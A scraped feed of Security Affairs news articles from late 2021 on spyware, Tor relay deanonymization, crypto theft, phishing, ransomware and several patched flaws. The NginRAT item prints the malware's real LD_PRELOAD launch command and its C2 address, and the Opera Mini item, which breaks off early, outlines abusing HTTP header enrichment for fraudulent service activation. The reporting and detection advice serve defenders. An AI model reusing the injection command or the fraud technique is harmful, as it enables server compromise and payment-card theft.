🔒
There are new articles available, click to refresh the page.
Yesterday — 3 December 2021Security Affairs

NSO Group spyware used to compromise iPhones of 9 US State Dept officials

3 December 2021 at 21:17

Apple warns that the mobile devices of at least nine US Department of State employees were compromised with NSO Group ‘s Pegasus spyware.

The iPhones of at least nine US state department officials were compromised with the NSO Group’s spyware Pegasus.

The US officials targeted by the surveillance software were either based in Uganda or focused on matters concerning the African country, revealed Reuters which was not able to determine which was NSO client that orchestrated the attacks.

“Apple Inc iPhones of at least nine U.S. State Department employees were hacked by an unknown assailant using sophisticated spyware developed by the Israel-based NSO Group, according to four people familiar with the matter.” reads the post published by Reuters. “The intrusions, first reported here, represent the widest known hacks of U.S. officials through NSO technology.”

NSO Group told Reuters that it is not aware of the tools used in the attacks and added it has canceled the customer accounts, anyway it declared that will investigate the incidents. NSO Group added that once the surveillance spyware is sold to a customer it is not able to know who will be the targets of the customer.

NSO announced that it will cooperate with any relevant government authority to track down the attackers.

“If our investigation shall show these actions indeed happened with NSO’s tools, such customer will be terminated permanently and legal actions will take place,” said an NSO spokesperson, who added that NSO will also “cooperate with any relevant government authority and present the full information we will have.”

Early November, the U.S. sanctioned four companies for the development of surveillance malware or the sale of hacking tools used by nation-state actors, including NSO Group. NSO Group and Candiru are being sanctioned for the development and sale of surveillance software used to spy on journalists and activists. 

In November, Apple has sued NSO Group and its parent company Q Cyber Technologies in a U.S. federal court for illegally targeting its customers with the surveillance spyware Pegasus.

According to the lawsuit, the surveillance firm is accountable for hacking into Apple’s iOS-based devices using zero-click exploits. The software developed by the surveillance firm was used to spy on activists, journalists, researchers, and government officials.

Apple also announced it would support with a contribution of $10 million to the academic research in unmasking the illegal surveillance activities

“Apple today filed a lawsuit against NSO Group and its parent company to hold it accountable for the surveillance and targeting of Apple users. The complaint provides new information on how NSO Group infected victims’ devices with its Pegasus spyware. To prevent further abuse and harm to its users, Apple is also seeking a permanent injunction to ban NSO Group from using any Apple software, services, or devices.” reads the announcement published by Apple.

The legal action aims at permanently preventing the infamous company from breaking into any Apple software, services, or devices.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Apple)

The post NSO Group spyware used to compromise iPhones of 9 US State Dept officials appeared first on Security Affairs.

KAX17 threat actor is attempting to deanonymize Tor users running thousands of rogue relays

3 December 2021 at 15:33

Since 2017, an unknown threat actor has run thousands of malicious Tor relay servers in the attempt to unmask Tor users.

A mysterious threat actor, tracked as KAX17, has run thousands of malicious Tor relay servers since 2017 in an attempt to deanonymize Tor users.

KAX17 ran relay servers in various positions within the Tor network, including entry and exit nodes, researchers at the Tor Project have removed hundreds of servers set up by the threat actor in October and November 2021.

In August 2020, the security researcher that goes online with the moniker Nusenu revealed that in May 2020 a threat actor managed to control roughly 23% of the entire Tor network’s exit nodes. Experts warned that this was the first time that a single actor controlled such a large number of Tor exit nodes. A Tor exit relay is the final relay that Tor traffic passes through before it reaches the intended destination. The Tor traffic exits through these relays, this means that the IP address of the exit relay is interpreted as the source of the traffic.  Tor Exit relays advertise their presence to the entire Tor network, so they can be used by any Tor user.

Controlling these relays it is possible to see which website the user connects to and, if an insecure connection is used, it is also possible to manipulate traffic. In May 2020, the threat actor managed to control over 380 Tor exit nodes, with a peak on May 22, when he controlled the 23.95% of Tor exit relay.

Nusenu told The Record that it has observed a recrudescence of the phenomenon associated to the same attacker.

“But a security researcher and Tor node operator going by Nusenu told The Record this week that it observed a pattern in some of these Tor relays with no contact information, which he first noticed in 2019 and has eventually traced back as far as 2017.” reads the post published by The Record. “Grouping these servers under the KAX17 umbrella, Nusenu says this threat actor has constantly added servers with no contact details to the Tor network in industrial quantities, operating servers in the realm of hundreds at any given point.”

Most of the Tor relay servers set up by the KAX17 actor were located in data centers all over the world and are configured as entry and middle points primarily. Nusenu pointed out that, unlike other threat actors he analyzed in the past, the KAX17 group only operates a small number of exit points.

This circumstance suggests that the group is operating to track Tor users within the anonymizing network, Nusenu also believes that the KAX17 is an APT group.

Below are some insights on the KAX17 profile provided by the researcher in a post:

  • active since at least 2017
  • sophistication: non-amateur level and persistent
  • uses large amounts of servers across many (>50) autonomous systems (including non-cheap cloud hosters like Microsoft)
  • operated relay types: mainly non-exits relays (entry guards and middle relays) and to a lesser extend tor exit relays
  • (known) concurrently running relays peak: >900 relays
  • (known) advertised bandwidth capacity peak: 155 Gbit/s
  • (known) probability to use KAX17 as first hop (guard) peak: 16%
  • (known) probability to use KAX17 as second hop (middle) peak: 35%
  • motivation: unknown; plausible: Sybil attack; collection of tor client and/or onion service IP addresses; deanonymization of tor users and/or onion services

The expert states that the probability to connect a guard relay operated by KAX17 was 16%, a percentage that pass to 35% when analyzing the probability to pass through one of the middle relays set up by the threat actor.

“The following graph shows (known) KAX17′ network fraction in % of the entire tor network for each position (first, second and last hop of a tor circuit) over the past 3 years.”

KAX17 Tor

Nusenu shared its findings with the Tor Project since last year, and the Tor security experts removed all the exit relays set up by the group in October 2020. The Tor Project also removed a set of KAX17 malicious relays between October, and November 2021.

The expert also states that KAX17’s poor OpSec revealed the use of email address in relay’s ContactInfo, but it is impossible to determine its authenticity, we cannot exclude that it is a false flag.

“Detecting and removing malicious tor relays from the network has become an impractical problem to solve. We presented a design and proof of concept implementation towards better self-defense options for tor clients to reduce their risk from malicious relays without requiring their detection.” concludes the researcher.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Tor)

The post KAX17 threat actor is attempting to deanonymize Tor users running thousands of rogue relays appeared first on Security Affairs.

Threat actors stole $120 M in crypto from BadgerDAO DeFi platform

3 December 2021 at 12:16

Threat actors stole $120 million in cryptocurrencies from multiple wallets connected to the decentralized finance platform BadgerDAO.

Threat actors this week have hacked the decentralized finance platform BadgerDAO and have stolen $120.3 million in crypto funds, blockchain security firm PeckShield reported. Most of the stolen funds, over $117 million, were Bitcoin, while the rest of the stolen assets were stored in the form of interest-bearing Bitcoin, a form of tokenised Bitcoin, and Ether.

BadgerDAO is a decentralised autonomous organisation (DAO) that allows customers to bridge user’s Bitcoin into other blockchains.

Here is the current whereabouts as well as the total loss: $120.3M (with ~2.1k BTC + 151 ETH) @BadgerDAO pic.twitter.com/fJ4hJcMWTq

— PeckShield Inc. (@peckshield) December 2, 2021

The attackers were able to inject a malicious script into the UI of BadgerDAO website that allowed them to intercept and hijack Web3 transactions. The funds were hijacked to the wallet under the control of the attackers.

Peckshield was able to track the stolen funds:

Here is the list of funds that were so far transferred out from victims @BadgerDAO pic.twitter.com/P5pOj1YQ2l

— PeckShield Inc. (@peckshield) December 2, 2021

The malicious script was injected as early as November 10th, but the threat actors ran it at random intervals to avoid detection. BadgeDAO notified US and Canadian authorities and is investigating the security breach with the help of forensics firm Chainalysis.

Badger has received reports of unauthorized withdrawals of user funds.

As Badger engineers investigate this, all smart contracts have been paused to prevent further withdrawals.

Our investigation is ongoing and we will release further information as soon as possible.

— ₿adgerDAO 🦡 (@BadgerDAO) December 2, 2021

The investigation continues.

Badger has retained data forensics experts Chainalysis to explore the full scale of the incident & authorities in both the US & Canada have been informed & Badger is cooperating fully with external investigations as well as proceeding with its own.

— ₿adgerDAO 🦡 (@BadgerDAO) December 2, 2021

Once Badger discovered the unauthorized transfers, it paused all smart contracts, it also advised users to decline all transactions to addresses that are under the control of the attackers.

According to The Verge website, Badger is investigating is how threat actors had access to Cloudflare via an API key that should’ve been protected by two-factor authentication.

“While the attack didn’t reveal specific flaws within Blockchain tech itself, it managed to exploit the older “web 2.0” technology that most users need to use to perform transactions. Multi-factor authentication systems protect our accounts against many phishing schemes or bulk credential stuffing attacks. Still, experts have repeatedly warned about targeted phishing attacks that can bypass it, while toolkits to automate the process have been available for years.” reported The Verge.

“All [the] blockchain / smart contract audits in the world, and people lose 120m to a Cloudflare API leak by a sloppy team where a dude passes a new approval to his contract in the site header – GG – we still have a long way to go.” A member of the team said, “I’m sure we will have some mitigation procedures proposed after this.” reads the comment of a user within Badger’s Discord.

DeFi platforms are under attack, according to a report published by AtlasVPN in august, the DeFi hacks accounted for 76% of all hacks between January and July 2021. The report states that over $129 million were stolen in DeFi attacks in 2020.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, BadgerDAO)

The post Threat actors stole $120 M in crypto from BadgerDAO DeFi platform appeared first on Security Affairs.

Watch out for Omicron COVID-19-themed phishing messages!

3 December 2021 at 08:45

Threat actors have started to exploit the interest in the Omicron COVID-19 variant and are using it as a lure in phishing campaigns.

Crooks have already started exploiting the interest in the Omicron COVID-19 variant and are using it as a lure in phishing attacks.

People are interested in the spreading of the new variant, the efficiency of the vaccines and the measures that will adopt the states to prevent its spreading, and threat actors are attempting to take advantage of this situation.

An Omicron COVID-19 campaign was spotted by UK authorities and the National Health Service (NHS) is warning about the Omicron COVID-19-themed phishing attacks.

⚠ SCAM OMICRON PCR EMAILS ⚠

Beware of fake NHS emails asking you to order a Omicron PCR test.

Link goes to a fake NHS website.

The NHS will:

❌NEVER ask for payment – the vaccine is free
❌NEVER ask for your bank details

Forward emails to [email protected] pic.twitter.com/GcGB3C5dLI

— Norfolk County Council Trading Standards (@NorfolkCCTS) November 30, 2021

@ukhsa advise of a #SCAM doing the rounds on social media purporting to offer #Omicron #PCRs #tscovid19

This has been reported & will be taken down but it is likely there will be more instances before it is removed, & there are reports of people querying it at test sites. pic.twitter.com/IXZ1qPStq5

— Dudley EHO – Play your part – #protectDudley (@myDudleyEHO) December 1, 2021

These phishing messages offer a free Omicron PCR test that will allegedly allow recipients to avoid restrictions. One of the samples shared by UK’s consumer protection organization ‘Which?’ and published by BleepingComputer were sent by the email ‘[email protected]’ in the attempt to make emails more credible.

Upon clicking on the link embedded into the message, recipients are redirected to a fake NHS website where to apply for a “COVID-19 Omicron PCR test.”

The recipients have to fill a form with their data (name, date of birth, home address, mobile phone number, and email address), some security questions (i.e. mother’s maiden name), and finalize the procedure by making a payment of £1.24 ($1.65).

Clearly, the scammers aim at stealing the payment details of the recipients while making the payment.

Authorities are urging the citizens to be aware of suspicious emails or text messages that may be asking for financial details (i.e. credit card data, banking data). The NHS never asks for financial details in legitimate email correspondence.

“The NHS will: NEVER ask for payment – the vaccine is free NEVER ask for your bank details.”

Users that will receive suspicious messages can report them at “[email protected]”.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Omicron COVID-19)

The post Watch out for Omicron COVID-19-themed phishing messages! appeared first on Security Affairs.

Before yesterdaySecurity Affairs

CISA adds Zoho, Apache, Qualcomm, Mikrotik flaws to the list of actively exploited issues

2 December 2021 at 20:17

U.S. CISA urges to address vulnerabilities Qualcomm, Mikrotik, Zoho and the Apache Software Foundation software.

U.S. Cybersecurity and Infrastructure Security Agency (CISA) has updated its catalog of actively exploited vulnerabilities recommending federal agencies to address the flaws in Qualcomm, Mikrotik, Zoho and the Apache Software Foundation software within specific timeframes and deadlines.

CISA also warns of risk to the federal enterprise for delaying to address these vulnerabilities.

The US Agency requests the Federal agencies to apply security patches for Zoho ManageEngine ServiceDesk flaws by December 15, 2021. The two flaws added to the catalog are the CVE-2021-37415 Zoho ManageEngine ServiceDesk authentication bypass vulnerability and the CVE-2021-44077 Zoho ManageEngine ServiceDesk Plus remote code execution.

Both issues have been actively exploited by nation-state actors over the last few months.

CISA also urges to address the CVE-2018-14847 MikroTik Router OS Directory Traversal Vulnerability within June 1th 2022.

Another flaw added to the catalog is the CVE-2021-40438 Apache HTTP Server-Side Request Forgery (SSRF) vulnerability that must be addressed by December 15, 2021. A few days ago, the German Cybersecurity Agency and Cisco warned of attacks exploiting the recently patched CVE-2021-40438 flaw in Apache HTTP servers.

The German BSI agency published an alert about this vulnerability, it is aware of at least one attack exploiting this flaw.

The fifth issue added to the list of actively exploited vulnerabilities is the CVE-2020-11261 Improper Input Validation flaw that impacts multiple Qualcomm chipsets. This vulnerability must be addressed by June 1th 2022.

Google warned that the Qualcomm vulnerability was exploited by threat actors in limited, targeted attacks.

“There are indications that CVE-2020-11261 may be under limited, targeted exploitation” reads a note added to the January security bulletin last week.

The CVE-2020-11261 flaw was reported to Qualcomm by Google’s Android Security team on August 20, 2020 and was addressed in January 2021.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Zoho)

The post CISA adds Zoho, Apache, Qualcomm, Mikrotik flaws to the list of actively exploited issues appeared first on Security Affairs.

Russian internet watchdog Roskomnadzor bans six more VPN services

2 December 2021 at 17:38

Russia’s internet watchdog, ‘Roskomnadzor’, has announced the ban of other VPN products, 15 VPN services are now illegal in Russia

Russian communications watchdog Roskomnadzor tightens the control over the Internet and blocked access to six more VPN services. The latest banned services are Betternet, Lantern, X-VPN, Cloudflare WARP, Tachyon VPN, PrivateTunnel.

The total number of banned VPN products reached 15, below is the full list of blocked services:

  • Hola! VPN
  • ExpressVPN
  • KeepSolid VPN Unlimited
  • Nord VPN
  • Speedify VPN
  • IPVanish VPN
  • VyprVPN
  • Opera VPN
  • ProtonVPN
  • Betternet
  • Lantern
  • X-VPN
  • Cloudflare WARP
  • Tachyon VPN
  • PrivateTunnel

Russia’s internet watchdog sent a request to inform the Center for Monitoring and Control of the Public Communications Network about the ban of the services from the systems of all registered Russian companies and public organizations.

The companies were banned because they did not meet the demand of the Roskomnadzor to connect their systems to the Federal State Information System (FGIS).

In September Russian communications watchdog Roskomnadzor blocked access to Hola!VPN, ExpressVPN, KeepSolid VPN Unlimited, Nord VPN, Speedify VPN, and IPVanish VPN.

Russian communications watchdog argued that VPNs could be abused for illegal activities online, including terrorism and child pornography. However, the watchdog made some exceptions for companies that leverage VPNs for their operations, for this reason, the regulator created a white list of software and apps that will be able to continue using VPN providers.

Russians ordinary use VPN services and other anonymizing services to access blocked content and bypass censorship, in the following graph we can see the continuous growth for the number of Tor users in Russia.

VPN services

In 2017, Russia’s parliament voted to ban web tools that could be used by people to surf outlawed websites, and the Duma approved the proposed bill to oblige anyone using an online message service to identify themselves with a telephone number.

The bill prohibited the use of any service from the Russian territory if they could be used to access blacklisted websites.

VPN operators and proxy services operating in the country must register themselves with the Government regularity authority.

Since May 3rd, 2018, Russia’s media and communication regularity authority Roskomnadzor blocked over 50 virtual private networks (VPNs), Web Proxies and Anonymizing networks.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, VPN services)

The post Russian internet watchdog Roskomnadzor bans six more VPN services appeared first on Security Affairs.

NginRAT – A stealth malware targets e-store hiding on Nginx servers

2 December 2021 at 16:18

Threat actors are targeting e-stores with remote access malware, dubbed NginRAT, that hides on Nginx servers bypassing security solutions.

Researchers from security firm Sansec recently discovered a new Linux remote access trojan (RAT), tracked as CronRAT, that hides in the Linux task scheduling system (cron) on February 31st.

CronRAT is employed in Magecart attacks against online stores web stores and enables attackers to steal credit card data by deploying online payment skimmers on Linux servers.

While investigating CronRAT infections in North America and Europe the researchers spotted a new malware, dubbed NginRAT, that hides on Nginx servers bypassing security solutions. Like CronRAT, also NginRAT works as a “server-side Magecart,” it injects itself into an Nginx process.

Experts pointed out that a rogue Nginx process could not be distinguished from the original.

“NginRAT essentially hijacks a host Nginx application to masquerade its presence. To do that, NginRAT modifies core functionality of the Linux host system. When the legitimate Nginx web server uses such functionality (eg dlopen), NginRAT injects itself. The result is a remote access trojan that is embedded in the Nginx process.” reads the analysis published by the experts. “On a typical eCommerce web server, there are many Nginx processes. And the rogue Nginx looks just like the others.”

The researchers discovered that NginRAT is delivered using CronRAT and both allow attackers to maintain remote access to the infected system.

In the infection process, CronRAT contact the command and control server at 47.115.46.167:443 using custom commands. One of the commands is dwn that downloads a Linux system library to /dev/shm/php-shared. Then, CronRAT launches

env LD_L1BRARY_PATH="[580 bytes]" \
    LD_PRELOAD=/dev/shm/php-shared \
    /usr/sbin/nginx --help --help --help --help --help --help --help --help \
    --help --help --help --help --help --help --help --help --help --help --help \
    --help --help --help --help --help --help --help --help --help --help --help \
    --help --help --help --help --help --help --help --help --help --help --help \
    --help --help --help --help --help --help --help --help --help 1>&2 &

to inject the NginRAT into the host Nginx application.

nginrat

“Once Nginx calls dlopen, NginRAT takes control. It removes the php-shared file, changes its process name to nginx: worker process, gathers information about the system and opens up a connection with the c&c server at 47.115.46.167. It then awaits further commands, possibly sleeping for weeks or months.” continues the post published by the researchers.

Experts explained that NginRAT hides into a legitimate Nginx host process, a /proc/PID/exe will point to Nginx. Another trick that makes the analysis of the malware challenging is that the library code is only written in memory and cannot be examined after its launch. The use of LD_L1BRARY_PATH (with typo) is an indicator of compromise.

In order to find malicious processes, admins can run this command:

$ sudo grep -al LD_L1BRARY_PATH /proc/*/environ | grep -v self/
/proc/17199/environ
/proc/25074/environ

Then it is possible to kill them with kill -9 <PID>.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, malware)

The post NginRAT – A stealth malware targets e-store hiding on Nginx servers appeared first on Security Affairs.

Europol arrested 1800 money mules as part of an anti-money-laundering operation

2 December 2021 at 09:46

Europol identified 18,351 money mules and arrested 1,803 of them as part of an international anti-money-laundering operation codenamed EMMA 7.

Europol has identified 18,351 money mules and arrested 1,803 of them as part of an international anti-money-laundering operation codenamed EMMA 7.

The operation is the result of a joint effort of 27 countries, Eurojust, INTERPOL, the European Banking Federation (EBF), and the FinTech FinCrime Exchange

The name EMMA is an acronym for European Money Mule Action operation, the first EMMA operation led by Europol took place in 2016.

The EMMA 7 operation was conducted between September 15 and November 30, 2021, it saw the contribution of law enforcement agencies from Australia, Austria, Belgium, Bulgaria, Colombia, Czech Republic, Estonia, Finland, Greece, Germany, Hong Kong, Hungary, Ireland, Italy, Moldova, Netherlands, Poland, Portugal, Romania, Singapore, Slovak Republic, Slovenia, Sweden, Switzerland, Spain, United Kingdom, United States.

The money mules have a crucial role in criminal organizations to launder money for a wide array of illegal activities, such as online scams, sim-swapping, e-commerce fraud, and phishing. Money mules receive and transfer money on behalf of crooks in exchange for a small fee.

“The operation resulted in 1 803 arrests and the identification of over 18 000 money mules.” reads the press release published by Europol. “It also revealed that money mules were being used to launder money for a wide array of online scams such as sim-swapping, man in the middle attacks, e-commerce fraud and phishing.”

money mules Europol EMMA 7

The authorities conducted 2,503 individual investigations, the operation prevented losses of €67.5 million by stopping 7,000 fraudulent transactions that were reported. According to Europol, around 400 banks and financial institutions supported the operation.

Another important result was the identification of 324 recruiters.

Europol pointed out that money mules can be recruited unknowingly into the criminal operation. Groups of individuals such as students, immigrants, and people in economic distress, are a privileged target of recruiters that offer them easy money. Recruiters leverage multiple channels, such as legitimate-looking job adverts and social media posts.

“Ignorance is not an excuse when it comes to the law and money muling; they are breaking the law by laundering the illicit proceeds of crime. For this reason, Europol coordinated the ‘#DontBeAMule’ awareness campaign with all participant countries, law enforcement and the EBF on behalf of the European banks, as a means to prevent more innocent bystanders being exploited by criminals and putting themselves at risk.” concludes the press release.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Europol)

The post Europol arrested 1800 money mules as part of an anti-money-laundering operation appeared first on Security Affairs.

Mozilla fixes critical flaw in Network Security Services (NSS) cryptography library

2 December 2021 at 05:26

Mozilla fixed a critical memory corruption issue affecting its cross-platform Network Security Services (NSS) set of cryptography libraries.

Mozilla has addressed a heap-based buffer overflow vulnerability (CVE-2021-43527) in its cross-platform Network Security Services (NSS) set of cryptography libraries.

Network Security Services (NSS) is a set of libraries designed to support cross-platform development of security-enabled client and server applications. Applications using NSS can support SSL v3, TLS, PKCS #5, PKCS #7, PKCS #11, PKCS #12, S/MIME, X.509 v3 certificates, and other security standards.

The flaw ties the way the libraries handle DER-encoded DSA or RSA-PSS signatures in email clients and PDF viewers using vulnerable NSS versions. The vulnerability was discovered by Project Zero researchers Tavis Ormandy.

“The maximum size signature that this structure can handle is whatever the largest union member is, in this case that’s RSA at 2048 bytes. That’s 16384 bits, large enough to accommodate signatures from even the most ridiculously oversized keys. The question is, what happens if you just…. make a signature that’s bigger than that? Well, it turns out the answer is memory corruption.” wrote Ormandy.

“The untrusted signature is simply copied into this fixed-sized buffer, overwriting adjacent members with arbitrary attacker-controlled data. The bug is simple to reproduce and affects multiple algorithms.”

“We believe all versions of NSS since 3.14 (released October 2012) are vulnerable” Ormandy added.

This is a major memory corruption flaw in NSS, almost any use of NSS is affected. The Mozilla advisory is here https://t.co/AL8suyLQFF https://t.co/uTQ2gqRZ5t

— Tavis Ormandy (@taviso) December 1, 2021

The vulnerability affects NSS versions 3.68.1 and NSS 3.73 and doesn’t impact Mozilla Firefox. The flaw was addressed with the release of NSS 3.73.0. Ormandy recommends vendors of products using the NSS to update their library.

“Applications using NSS for handling signatures encoded within CMS, S/MIME, PKCS #7, or PKCS #12 are likely to be impacted. Applications using NSS for certificate validation or other TLS, X.509, OCSP or CRL functionality may be impacted, depending on how they configure NSS.” reads the security advisory published by Mozilla.

NSS is used by many companies, including AOL, Red Hat, and Google. The list of products using the library:

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, CVE-2021-43527)

The post Mozilla fixes critical flaw in Network Security Services (NSS) cryptography library appeared first on Security Affairs.

VirusTotal Collections allows enhancing the sharing of Indicators of Compromise (IoCs)

1 December 2021 at 19:37

VirusTotal announced VirusTotal Collections, a new service that allows security researchers to share sets of Indicators of Compromise (IoCs).

VirusTotal announced VirusTotal Collections, a new service that allows threat researchers to share Indicators of Compromise (IoCs).

A collection is a live report that includes IoCs associated with a specific threat and it is available for VirusTotal registered users. The reports will also include up-to-date VirusTotal analysis metadata.

“A collection is a live report which contains a title, a group of IoCs (file hashes, URLs, domains and IP addresses) and an optional description. Collections are open to our VirusTotal Community (registered users) and they will be enhanced with VirusTotal analysis metadata providing the latest information we have for the IoCs, along with some aggregated tags.” reads the announcement published by Virus Total.

Registered VirusTotal users will be able to add or remove IoCs to/from the reports.

Security experts often use sharing platforms like Pastebin to share IoCs with the community, now they have a dedicated platform to do it, which is also integrated with the information from Virus Total. Users can create IoC collections in the VirusTotal home page, under the SEARCH tab.

VirusTotal Collections

VirusTotal Collections is accessible via UI and API, it also allows to share the report using permalink that could be easily integrated into blog posts and third-party reports.

“All our community generated content, including comments, graphs and collections will contribute to the Community section of file, URL, domain and IP address reports. This means that if a security researcher creates a Collection with a file in it, if you visit the file report you will see the collection in the community section,” VirusTotal adds.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Collections)

The post VirusTotal Collections allows enhancing the sharing of Indicators of Compromise (IoCs) appeared first on Security Affairs.

New RTF Template Inject technique used by APT groups in recent attacks

1 December 2021 at 15:11

Nation-state actors from China, India, and Russia, were spotted using a novel RTF template injection technique in recent attacks.

APT groups from China, India, and Russia have used a new RTF (rich text format) template injection technique in recent phishing attacks.

The technique was first reported by the security firm Proofpoint spotted which observed phishing campaigns using the weaponized RTF template injection since March 2021. The experts believe that nation-state actors will continue to use the technique in future campaigns.

The RTF template injection technique abuses legitimate RTF template functionality to subvert the plain text document formatting properties of the file and retrieve a malicious payload from a remote server instead of a file resource via an RTF’s template control word capability. The feature used by attackers allow to load an RTF template from a specific URL resource instead of a local file resource. Threat actors simply replace a legitimate file destination with a malicious download link. 

Experts pointed out that the technique has a lower detection rate by public antivirus engines when compared to the Office-based template injection technique.

“Proofpoint has identified distinct phishing campaigns utilizing the technique which have been attributed to a diverse set of APT threat actors in the wild. While this technique appears to be making the rounds among APT actors in several nations, Proofpoint assesses with moderate confidence, based on the recent rise in its usage and the triviality of its implementation, that it could soon be adopted by cybercriminals as well.” reads the analysis published by ProofPoint.

“By altering an RTF file’s document formatting properties, specifically the document formatting control word for “\*\template” structure, actors can weaponize an RTF file to retrieve remote content by specifying a URL resource instead of an accessible file resource destination.”

In the attacks observed by the researchers, threat actors used Unicode signed character notation to obfuscate the URL value included in the RTF file. The trick was used in the attempt to evade static detection signatures in anti-virus engines.

RTF template injection technique

The attack also works when in the case of .doc.rtf files that are opened utilizing Microsoft Word. When an RTF Remote Template Injection file is opened with MS Word, the application will retrieve the resource from the specified URL before displaying the content of the file. 

Proofpoint reported it observed the technique was used by DoNot Team, Gamaredon, and a TA423 APT groups.

RTF Template Injection 2

“The viability of XML Office based remote template documents has proven that this type of delivery mechanism is a durable and effective method when paired with phishing as an initial delivery vector. The innovation by threat actors to bring this method to a new file type in RTFs represents an expanding surface area of threat for organizations worldwide.” concludes the report. “While this method currently is used by a limited number of APT actors with a range of sophistication, the technique’s effectiveness combined with its ease of use is likely to drive its adoption further across the threat landscape.”

Proofpoint shared YARA signatures for the attacks using this technique.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, RTF template injection)

The post New RTF Template Inject technique used by APT groups in recent attacks appeared first on Security Affairs.

FBI training document shows lawful access to multiple encrypted messaging apps

1 December 2021 at 09:57

Which are the most secure encrypted messaging apps? An FBI document shows what data can be obtained from them.

The Record shared an FBI training document that reveals the surveillance capabilities of the US law enforcement detailing which data can be extracted from encrypted messaging apps.

The document analyzes lawful access to multiple encrypted messaging apps, including iMessage, Line, Signal, Telegram, Threema, Viber, WhatsApp, WeChat, or Wickr.

Source Property of the People

The above document, dated to January 7, 2021, was obtained through a FOIA request filed by the US nonprofit organization Property of the People.

We got an FBI training doc on obtaining data from secure messaging apps, and shared it w/ @AndyKroll/@RollingStone. #FOIA https://t.co/FcjEUV1sN3

— PropertyOfThePeople (@PropOTP) November 29, 2021

“As of November2020, the FBl’s ability to legally access secure content on leading messaging applications is depicted below, including details on accessible information based on-the applicable legal process. Return data provided
by the companies listed below, with the exception of WhatsApp, are actually logs of latent data that are provided to law enforcement in a non-real-time manner and may impact investigations due to delivery delays.” reads the document.

The information reported in the training documents provides an up to date picture of the abilities of law enforcement in accessing the content of popular messaging apps.

Feds cannot access the message content for Signal, Telegram, Threema, Viber, WeChat, and Wickr, while they can gain limited access to the content of encrypted communications from iMessage, Line, and WhatsApp.

Anyway, depending on the single encrypted messaging apps, law enforcement could extract varying metadata that could allow unmasking the end-users.

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, messaging apps)

The post FBI training document shows lawful access to multiple encrypted messaging apps appeared first on Security Affairs.

Sabbath Ransomware target critical infrastructure in the US and Canada

1 December 2021 at 07:25

Sabbath ransomware is a new threat that has been targeting critical infrastructure in the United States and Canada since June 2021.

A new ransomware group called Sabbath (aka UNC2190) has been targeting critical infrastructure in the United States and Canada since June 2021. According to Mandiant researchers, the group is a rebrand of Arcane and Eruption gangs.

According to a warning from Mandiant, the group previously operated under the names of Arcane and Eruption and was observed last year deploying the ROLLCOAST ransomware. In September 2021, the security experts noticed a post on the exploit.in hacking forum looking for affiliated for a new ransomware operation. The activity of the new group, named 54BB47h (Sabbath), began on October 21, 2021, when the operators set up a shaming site and blog.

In October the ransomware gang infected systems at a school district in the United States and demanded a multi-million ransom.

Sabbath ransomware

Unlike other ransomware operations, Sabbath operators provided its affiliates with pre-configured Cobalt Strike BEACON backdoor payloads.

“In contrast with most other affiliate programs, Mandiant observed two occasions where the ransomware operator provided its affiliates with pre-configured Cobalt Strike BEACON backdoor payloads. While the use of BEACON is common practice in ransomware intrusions, the use of a ransom affiliate program operator provided BEACON is unusual and offers both a challenge for attribution efforts while also offering additional avenues for detection.” reads the post published by Mandiant.

The Sabbath ransomware gang has targeted critical infrastructure, including education, health, and natural resources in the United States and Canada. 

In July 2020, the UNC2190 threat actors deployed ROLLCOAST ransomware while they were branded as Eruption. Mandiant researchers found no evidence for the use of the same ransomware in 2021.

The ROLLCOAST ransomware runs in memory and checks the system language to avoid infecting Russia and other Commonwealth of Independent States member countries.

ROLLCOAST also shows similarities to Tycoon ransomware, such as the use of AES in GCM mode for encryption and an overlap between the ignored directories, files, and extensions including the ignored extension “.lolz”.

In 2021, BEACON samples and infrastructure from both Sabbath and Arcane ransomware affiliate services have not changed. Mandiant discovered that the ransomware operators are using the Themida packer to pack UNC2190 BEACON malware and avoid detection.

“Although UNC2190 is a lesser known and potentially a smaller ransomware affiliate group, it’s smaller size and repeated rebranding has allowed it to avoid much public scrutiny.” concludes the report. “UNC2190 has continued to operate over the past year while making only minor changes to their strategies and tooling, including the introduction of a commercial packer and the rebranding of their service offering. This highlights how well-known tools, such as BEACON, can lead to impactful and lucrative incidents even when leveraged by lesser-known groups.”

Follow me on Twitter: @securityaffairs and Facebook

Pierluigi Paganini

(SecurityAffairs – hacking, Sabbath ransomware)

The post Sabbath Ransomware target critical infrastructure in the US and Canada appeared first on Security Affairs.

Play the Opera Please – Opera patches a flaw in their turbo servers

30 November 2021 at 21:24

Opera released a mini patch for a vulnerability in their turbo servers that dates back to 2018.

Prior approval are taken from Opera security team before disclosing this issue!

Before we get started there are few things which we need to understand such as,

Value added service (VAS): Value added services (VAS) is a popular telecommunications term for non-core services, example: (Caller-tunes, Missed call alerts, Online gaming etc).

GGSN: The gateway GPRS support node (GGSN) is a main core component, GGSN is responsible for the interworking between the GPRS network and external packet, basically this is a routing device.

HTTP header enrichment (HE Process): HTTP header enrichment is the process of adding data fields in the HTTP header. This is commonly used in mobile networks by adding user and device identifiers in HTTP requests such as IMEI, IMSI, MSISDN or other data to identify subscriber or mobile device details[1].

As per my understanding during a VAS subscription process, GGSN picks up the MSISDN from HTTP header to subscribe end users, the idea is to abuse HTTP header enrichment process via Opera mini browser which could lead to fraudulent VAS activation.

Why Opera mini? Opera mini is famous for data compression (data saving mode) although it supports three types of data savings compressions modes. direct, extreme and high.

